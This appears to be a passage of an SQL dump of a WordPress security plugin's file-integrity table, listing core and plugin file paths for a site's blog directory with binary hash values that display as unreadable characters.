('V�4=<��8���X�','wp-content/plugins/elementor/core/settings/manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/settings/manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�K��uyL1�R�<','?��5�Y�A�\r(�_�)�\\�v��U,�}�Pw','',0,'?'),
('V�����댏$�x','wp-admin/js/post.js','/var/www/html/ictbank/blog/wp-admin/js/post.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ߣ��x{9i=�5��','�ȑ�CY�r�,/�\n���3���ٕk��N)\"u�','',0,'?'),
('V�!�U9�D��`�}�','wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/RequestInterface.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/psr/http-message/src/RequestInterface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��X\n).3�`KX��0','��@b\'PHF�>u�f�T���=�D��\n','',0,'?'),
('V����rz�(�nol*','wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OU��0!�u��bG|��','h�]�%�����I � ���I\0|�1�V~�\n`','',0,'?'),
('V��B����jf���v','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushScala.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushScala.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','50\\yJ�<6���r�p','Pw$I��\"A� \n��6�\'><PxocB���','',0,'?'),
('VÄ�nͲ�$��mq�h','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/Exception/IncompatibleIpVersionException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ϷN=|�Уwu�����','��$,oo����]҇fY{B\\\0Q��_�n','',0,'?'),
('V��y�P�{z�*���O','wp-content/uploads/woocommerce-placeholder-768x768.png','/var/www/html/ictbank/blog/wp-content/uploads/woocommerce-placeholder-768x768.png',0,'G��R:�ɧ���8�','G��R:�ɧ���8�','��k��GB X6%����NCNx�N�[>�\0','',0,'?'),
('V�_��A�hEB�ZGZG�','wp-content/plugins/elementor-pro/modules/forms/classes/getresponse-handler.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/classes/getresponse-handler.php',0,'\'UD�� ���XpC�G�','\'UD�� ���XpC�G�','� @�Cd\\���t�!\'�\Z��9�lg� ,','',0,'?'),
('V׀��\'h��Ĉ+:��','wp-admin/includes/network.php','/var/www/html/ictbank/blog/wp-admin/includes/network.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8iЮ���ŧ�G��','��]���&�;�!`�� 6��W�G����;','',0,'?'),
('V�u�xp��R�cQ�\"�','wp-includes/Requests/src/IdnaEncoder.php','/var/www/html/ictbank/blog/wp-includes/Requests/src/IdnaEncoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ދ}���2e�e','}C\r�0gN5��#��<�W`+\0%F�d�s�{�Lrd','',0,'?'),
('Ws�$8�~��Nȁ-�@','wp-includes/js/mediaelement/mediaelementplayer.css','/var/www/html/ictbank/blog/wp-includes/js/mediaelement/mediaelementplayer.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�ĪL��5��!\n�','o��^:v\\���m���o����cTW[���k','',0,'?'),
('W��WO���>��mA','wp-content/plugins/wordpress-seo/src/presenters/open-graph/title-presenter.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/presenters/open-graph/title-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��:=I3�$,�.իCN','A�_Sķc1��IC�Zcd��0Ini�AF�e','',0,'?'),
('W>fg>��:{��<&','wp-content/plugins/wordpress-seo/src/services/health-check/postname-permalink-check.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/services/health-check/postname-permalink-check.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','P��\r�Ekܙ-��/5�g','U�^�\Z�%� 6x�߆D��s�[F� �X','',0,'?'),
('W&�ִ �)+�ڱ���','wp-admin/includes/class-plugin-installer-skin.php','/var/www/html/ictbank/blog/wp-admin/includes/class-plugin-installer-skin.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T�%,w���I��r��','�J���Qޒ[�\nY�:�=�BGΖ��lG=�<$�','',0,'?'),
('W8h�!ɩk�ĉ\'�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r�RU�b�*��\0\'�','x����<�s��BZ�2�j��RM\'0%$��i{ V','',0,'?'),
('WT�n��Ԏy�^ޖ�','wp-content/plugins/elementor-pro/modules/theme-builder/widgets/archive-title.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/widgets/archive-title.php',0,'T�]�Vّ\'[>','T�]�Vّ\'[>','�3��3<G՚\n,�3 ��dx�j�-��M�','',0,'?'),
('Wc�R����hW�4�','wp-content/plugins/elementor/app/modules/onboarding/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/onboarding/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','W2�9���U�f{ע�','+�9����7�d���Ͷ���\0i�d,���','',0,'?'),
('Wf��)xu��K����>','wp-content/plugins/wordpress-seo/src/config/migrations/20200513133401_ResetIndexableHierarchyTable.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/config/migrations/20200513133401_ResetIndexableHierarchyTable.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%/�d��^��N�`T�}','S�c8���L��B��ܮ�Lu%۔��u','',0,'?'),
('Ws��{N�hP�r�㼱','wp-content/plugins/wordfence/lib/dashboard/widget_ips.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/dashboard/widget_ips.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w��9�64\"�k��y','�X�������\"v����-*������3','',0,'?'),
('Wx\Z�Ta��7{��','wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���1�-�yS�kg','4\Z��H+*P��`�,汹��҄|�*��Վp','',0,'?'),
('W{�g- X��\'=n8','wp-admin/moderation.php','/var/www/html/ictbank/blog/wp-admin/moderation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Z�EVU��u�������','��Fq�6��1����<���w�t&�b����1��','',0,'?'),
('W})Ӗ7���e�}5�9,','wp-admin/load-styles.php','/var/www/html/ictbank/blog/wp-admin/load-styles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"�.B����h��mi��','�(h��Ǒ:��;�4�D{#t���x�3','',0,'?'),
('W�) ��(v/���3�1','wp-includes/html-api/class-wp-html-processor-state.php','/var/www/html/ictbank/blog/wp-includes/html-api/class-wp-html-processor-state.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��A�q�ܛ��g��','r|���=���At&�q�@$O�.}ЭM�E','',0,'?'),
('W��LjN/�@Ϣ�ư�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/SecretStream/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T ��nr�k���','�;\\��Xځ��/0;��Q�P�.�B4��\Z�','',0,'?'),
('W�,q�1@&��^B�D�','wp-content/uploads/2021/05/Slide02-100x100.jpg','/var/www/html/ictbank/blog/wp-content/uploads/2021/05/Slide02-100x100.jpg',0,'CCfT�l�L���ԕFd','CCfT�l�L���ԕFd','�\Z�\\���;����0j\nP��O�ꯏ��e','',0,'?'),
('W��64<<�5}:ׄ�)�','wp-content/plugins/wordfence/css/wf-onboarding.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/wf-onboarding.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?۷Bq-UO�Ze ','���Զ�X}���C�_��,�� fF��*6��','',0,'?'),
('W�x��\n?��H)i','wp-content/plugins/elementor/app/modules/kit-library/data/taxonomies/controller.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/kit-library/data/taxonomies/controller.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�k�KJ��>Ἵ� �','���7���J��Eޯ����S$R\nձ�GR�','',0,'?'),
('Xǧ|$_�`��I�\n','wp-content/plugins/elementor/modules/floating-buttons/admin-menu-items/floating-buttons-empty-view-menu-item.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/floating-buttons/admin-menu-items/floating-buttons-empty-view-menu-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�o�M.���J�/�','yu�&������*�TRf��0I��4z�h�','',0,'?'),
('Xͮ���xⷙ�#��','wp-content/plugins/wordpress-seo/inc/class-wpseo-replace-vars.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/inc/class-wpseo-replace-vars.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z\Z��ȫ<jN�_ 6',' yLX��=-���yA5�F\n:9$@\Z^\Z2r1�l�','',0,'?'),
('X͉8�S ����U2�','wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Exceptions/InvalidOperatorType.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Exceptions/InvalidOperatorType.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1ߺ�q��*��E��;�s','n�^�͛��c���7\0��d.&��@x�\0`�','',0,'?'),
('X!ʺZ�P灭ϋ�P<<','wp-content/plugins/wordpress-seo/src/promotions/domain/black-friday-checklist-promotion.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/promotions/domain/black-friday-checklist-promotion.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�݈or���m�Lw^�','��q��M��(��A�/�N�1qv�I^�-?��','',0,'?'),
('X,�E�Cj$_��8I��0','wp-includes/images/smilies/icon_cool.gif','/var/www/html/ictbank/blog/wp-includes/images/smilies/icon_cool.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��`����ivj.�','�事F�9;2_ �$�$~�LO�a��6���_','',0,'?'),
('X.[��R.l=�\Z��','wp-content/plugins/elementor-pro/modules/forms/actions/email.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/forms/actions/email.php',0,'�\Zܘ9��v3�R','�\Zܘ9��v3�R','�\r��~߬#�Q�J���V���6dOo�.E\n�','',0,'?'),
('X6�aOɲ\0�\'��Z\0','wp-content/plugins/elementor-pro/core/database/base-migration.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/database/base-migration.php',0,'��F=F�K-[t�Z�g','��F=F�K-[t�Z�g','�s5K,����=i���*��g����L��','',0,'?'),
('XJ��\n�sp3t9!҈','wp-includes/style-engine/class-wp-style-engine.php','/var/www/html/ictbank/blog/wp-includes/style-engine/class-wp-style-engine.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>�㺸���\Z��w�i','pO�^�\0��W�k�w!��~�l�}�nutG�o:','',0,'?'),
('XZ?מ6L�帝� �','wp-content/plugins/elementor/assets/images/app/onboarding/Blank_Preview.jpg','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/images/app/onboarding/Blank_Preview.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S���Z}�}bE�^','�\n�4��K&I��v����%H�ۺC|���ɩ�','',0,'?'),
('XZA�ʃ���\n�Va�','wp-content/plugins/elementor/core/page-assets/data-managers/font-icon-svg/manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/page-assets/data-managers/font-icon-svg/manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D������Y�9D^�','���/$��|�<HI]���Te� 0�e��','',0,'?'),
('X\\QDӨp�H�ʯ','wp-content/plugins/elementor/assets/css/widget-accordion.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/widget-accordion.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��~�\r\'�\'���\\ �','��: �R\'i���w�niWx�x�ѝ�!@X �w','',0,'?'),
('Xd��,p8�yD<;\"q','wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��Lm�rc���','R��/VN>�O���b��w^k��^�\'3','',0,'?'),
('Xg#�m\rf�j�7m�^','wp-includes/blocks/post-title.php','/var/www/html/ictbank/blog/wp-includes/blocks/post-title.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v��Ҽ�Y���r','��o����l�KJi<\0I&�ysy�R�\r�6�.!','',0,'?'),
('Xj��<\Z��8s\"��2�','wp-content/plugins/elementor/modules/floating-buttons/widgets/contact-buttons.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/floating-buttons/widgets/contact-buttons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2s���?*_@��5w��','&9�@���x��.�B]»�+�%�� Y�','',0,'?'),
('Xv!�ZeT�,;V��?n','wp-content/plugins/elementor-pro/modules/notes/user/preferences.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/notes/user/preferences.php',0,'EO�d�#�\Z��?�','EO�d�#�\Z��?�','�`�E@��e�7_�A��B�Y9���R\ZF��֛e<','',0,'?'),
('X�:8+˓2>V]��8�','wp-admin/images/sort-2x.gif','/var/www/html/ictbank/blog/wp-admin/images/sort-2x.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Aìk�:�bтvFj','\'���aK�\0tGJ�Bq��XW*(J|1���z[(','',0,'?'),
('X�i83��qb|��,\r','wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/mmdb-reader/src/IpAddress.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�f!Ɏ�Г�°�','F�v��^Z��Su؞��Ł��p�\n��Ck','',0,'?'),
('X�2�FGr��m��F��','wp-includes/blocks/button/editor.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/button/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<Z\Z�Ȣ83K�ٌ.cG�','���w;���3�geV��\nt�E��O-U?���ne','',0,'?'),
('X��іs0��>�ߥ��','wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/styles/wrapping.png','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter2/styles/wrapping.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�M�3� /U�9*�-�','��fh�uM�ʷF#�F{uJ��C��(�','',0,'?'),
('X��=�l3�&�\r�\'�','wp-content/plugins/elementor/app/modules/kit-library/kit-library-menu-item.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/modules/kit-library/kit-library-menu-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\0�/�\0��s','B~��e?@���3q� �*��<��3<JY�au','',0,'?'),
('X�s��Yq���ePL','wp-includes/blocks/code/block.json','/var/www/html/ictbank/blog/wp-includes/blocks/code/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�a����V�0_��','�\"=��P��*ѐ|6L��E�?��%B�i�k','',0,'?'),
('X�-��7P�>vůiau','wp-content/plugins/wordpress-seo/src/analytics/user-interface/last-completed-indexation-integration.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/analytics/user-interface/last-completed-indexation-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�LvǼ�\Z�(�\n����','W�iwg� :zBK��n�$8�V,�Tm��O','',0,'?'),
('X�֏�|5_8Ep�A��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/BufferStream.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/BufferStream.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʟ@�2$a��oJl<','Nk{n�\'_Mv�a|��guȟ�n&�F��I','',0,'?'),
('X���G������z�X','wp-admin/includes/class-wp-upgrader.php','/var/www/html/ictbank/blog/wp-admin/includes/class-wp-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'o��j��Abi�@vT�','�ig<3���n�.�2�#H�\r��~�h�l�c','',0,'?'),
('X�~�Vzl!_�]/�-3','wp-content/plugins/wordfence/models/firewall/wfFirewall.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/models/firewall/wfFirewall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X��C��#B�sT�b','×GH����5kӹr�ܰRR��_�x�-�','',0,'?'),
('X�k(D��qț��G��','wp-includes/js/jquery/ui/slider.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/slider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5��|���c�WK�xb�',' u�/\\G�؆�#���(�,gMw�+yțF��T','',0,'?'),
('X��N��8�j����c�','wp-includes/blocks/post-excerpt/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/post-excerpt/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','͐�/�-\0I]T~�� ��','��a���&�jf�#�\Z-Cx��WO���n���pj','',0,'?'),
('X�\"m�@�Q���|��','wp-content/plugins/elementor/license.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor/license.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"9��sF:�t�\rG��','���F�}�Ռ���O�X���� #����#�','',0,'?'),
('X�oȜ%���s���!ܣ','wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/data/commands/templates.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/site-editor/assets/js/data/commands/templates.js',0,'ʱ��n�!D�kn��','ʱ��n�!D�kn��','�m�Ltyǰx������HSx�,0],�Tv','',0,'?'),
('X�[�/�i�ɒ!\'�','wp-content/plugins/elementor-pro/assets/js/form-submission-admin.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/form-submission-admin.js',0,'C����>�s ]h��j','C����>�s ]h��j','�(�t��0���� ����A�B�M�&���B2','',0,'?'),
('X��;�BG�4���o���','wp-content/plugins/elementor/modules/compatibility-tag/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/compatibility-tag/module.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��W�ٟ�$Vb��g','TW}τ��W�G��i덛�ňՁcuC[�T��','',0,'?'),
('X�=�2h4�/{�+','wp-includes/spl-autoload-compat.php','/var/www/html/ictbank/blog/wp-includes/spl-autoload-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6��u�{�t���','��,�Z\rM >܅��g�p�/� Z\Z#`!�.','',0,'?'),
('X�TCW_^��og��','wp-admin/includes/class-wp-debug-data.php','/var/www/html/ictbank/blog/wp-admin/includes/class-wp-debug-data.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��)�cy����%�','�ʔy1M?�ӑz��1�����up�`�','',0,'?'),
('Y�&��j�\r�(�','wp-content/plugins/elementor-pro/assets/js/mega-menu.43866105e5e8e1a3f38d.bundle.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/mega-menu.43866105e5e8e1a3f38d.bundle.min.js',0,'�ԯa�Y+1���VC�','�ԯa�Y+1���VC�',';��ՠ9\r�8�+�9�6x�c4��2#���o9','',0,'?'),
('Y ����.Q&��o�,','wp-content/plugins/elementor-pro/modules/woocommerce/tags/product-image.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/tags/product-image.php',0,'��\"���-����8�j','��\"���-����8�j','��7�$SP��w{���uA�u\Z�j<�h�S�','',0,'?'),
('Y(�K���g\0��_��','wp-includes/js/dist/annotations.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/annotations.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�P[�ȼ�B]��\0��Q',' �^=��du��[�Ӛ�����fdy�σ��\n','',0,'?'),
('Y,Qp�gmu#�e���~','wp-includes/widgets/class-wp-nav-menu-widget.php','/var/www/html/ictbank/blog/wp-includes/widgets/class-wp-nav-menu-widget.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oD���gI]�.op[','U��ŋ�d�#�mdƂ26�\r�z,���v*�f','',0,'?'),
('Y/�ޑ� ���\Z���','wp-includes/js/dist/escape-html.js','/var/www/html/ictbank/blog/wp-includes/js/dist/escape-html.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�(6��;��`@%K�R','�f��w`}���@����6�:�֘,j=�Uo','',0,'?'),
('Y?��=v ���','wp-content/plugins/elementor-pro/core/database/model-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/database/model-base.php',0,'�f���\n�Z�2C��','�f���\n�Z�2C��','�w||L�hU���oDu6��<H�ي������7Y','',0,'?'),
('YBt\n�\nc�ݟ.��vi','wp-content/plugins/wordfence/views/diagnostics/text.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/views/diagnostics/text.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z��ɬ�5�3���;�','�n�TY/൪_,nl�[�lW�����ZA�s�%','',0,'?'),
('YB�B;�:�~��%���','wp-content/plugins/elementor/assets/lib/waypoints/waypoints-for-editor.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/waypoints/waypoints-for-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1��t�Po���D�','9�\rO:r�� �=�M6�\0�l�ݡќP��-�~','',0,'?'),
('YV�2��9}D8�','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/random_bytes_mcrypt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�CZ?��@J�N_ji<�\Z','�<�H���\"��F�@����%���1`7<�� ��}','',0,'?'),
('Yk.�V�7CZwD�H�','wp-content/plugins/elementor-pro/core/app/modules/import-export/runners/export/templates.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/core/app/modules/import-export/runners/export/templates.php',0,'�\n\n�z�ԫ��S�2Q�t','�\n\n�z�ԫ��S�2Q�t','U����<�緿�Ν?��w�$��F2�\0Ţ','',0,'?'),
('Y~v!���j��e+���','wp-content/plugins/syntaxhighlighter/third-party-brushes/shBrushMatlabKey.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/third-party-brushes/shBrushMatlabKey.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' y$(�\Z�d���3�K�?','�@�U��j�� ~=!à�S+�r����f%��\Z','',0,'?'),
('Y��T\n*7v�]�PF#�','wp-content/plugins/elementor-pro/modules/popup/assets/images/triggers/scrolling_to.svg','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/popup/assets/images/triggers/scrolling_to.svg',0,'�^ӱ����l+�0��d�','�^ӱ����l+�0��d�','(^�&\")ig��-�}�Ix��\\�\nޝ�','',0,'?'),
('Y�La���h�(','wp-admin/edit.php','/var/www/html/ictbank/blog/wp-admin/edit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b��Zz�f�d�$�','��.S�.�x?�N�aZ_�+L��;�5�D��d','',0,'?'),
('Y���ѿ~�y\r~���','wp-content/plugins/elementor/assets/lib/pickr/themes/monolith.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/pickr/themes/monolith.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.����<z� �','|h\"��yڑF�p���d&��9�Sf|�|u��','',0,'?'),
('Y�,�e�A��w�`���','wp-includes/images/media/archive.png','/var/www/html/ictbank/blog/wp-includes/images/media/archive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9����h�\0��ì�u','\0�Bb�3��\'��\'��)JG ��](G�9Pr2 s','',0,'?'),
('Y�<\\�(jΈ�6b):�','wp-content/plugins/wordpress-seo/src/integrations/alerts/trustpilot-review-notification.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/integrations/alerts/trustpilot-review-notification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F|�O>I[}~C:��xI�','�eV�Lxk:��G�_7�b�z�<<SԈL��_�#�','',0,'?'),
('Y�BWy +�B�Om�z','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/namespaced/Core/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#��:��N�\'�Dx��N','�[��_|А�~E����+�~�E�(�`�_��','',0,'?'),
('Y�68�H;%,�_c\n�','wp-includes/css/wp-auth-check.min.css','/var/www/html/ictbank/blog/wp-includes/css/wp-auth-check.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aק1��~^w��F���','O�������l�T,�R3G ;��_7� ','',0,'?'),
('Y�4Z��!�\"��*�k','wp-content/uploads/2021/05/Slide01-280x180.jpg','/var/www/html/ictbank/blog/wp-content/uploads/2021/05/Slide01-280x180.jpg',0,'c}�Y-��bwBcI�','c}�Y-��bwBcI�','��SeP\Z�p\r2�S�eq��h�e#�e��/>��','',0,'?'),
('Y��#��j�D�_2n','wp-content/plugins/wordpress-seo/src/editors/framework/seo/posts/keyphrase-data-provider.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/editors/framework/seo/posts/keyphrase-data-provider.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�nw��>5s١�@+ħ','Nݝ+� zR4 �턻~��9q:a�M���S','',0,'?'),
('Y�Йi�z#Oŭ�Iˤ8','wp-content/plugins/elementor/assets/lib/color-thief/color-thief.min.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/color-thief/color-thief.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Γ���a7����','��N�Yk����\\<|�ƞ Z��8y֝��op','',0,'?'),
('Y�&)_�����w�o�8�','wp-content/plugins/wordpress-seo/images/alert-success-icon.svg','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/alert-success-icon.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��?h�0X���','�,�0\ZA/�Z�eK�O\\pң\ndF��\nef�i�','',0,'?'),
('Y�&a{ ������l','wp-content/uploads/2022/02/linux-1024x1024.png','/var/www/html/ictbank/blog/wp-content/uploads/2022/02/linux-1024x1024.png',0,'�Z���+�_��p�=','�Z���+�_��p�=','����%��c5��2���S�҈�۞f���(��U','',0,'?'),
('Y���\'K`HP�Y�s','wp-content/plugins/wordpress-seo/src/config/migrations/20210817092415_AddVersionColumnToIndexables.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/config/migrations/20210817092415_AddVersionColumnToIndexables.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�HFjb�Uv��|�I�','�!�O�N�}#����쒦=���Ev݄�\0fTٶ�C','',0,'?'),
('Y�J��|��[D��y�Y','wp-content/plugins/wordfence/waf/.htaccess','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/waf/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�E\"xK��{�8�dS�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),
('Y�x^����z�,U�','wp-content/plugins/elementor/includes/widgets/icon.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/widgets/icon.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','GR\r\'�Anc�� h�-}','y��H�3RQ��o�4������`DFI','',0,'?'),
('Y����]���ŞI���','wp-includes/js/jquery/ui/effect-slide.min.js','/var/www/html/ictbank/blog/wp-includes/js/jquery/ui/effect-slide.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��m��8���+�','��IF\0a{|�\'(�nJ�/�c�\n��-��:G9','',0,'?'),
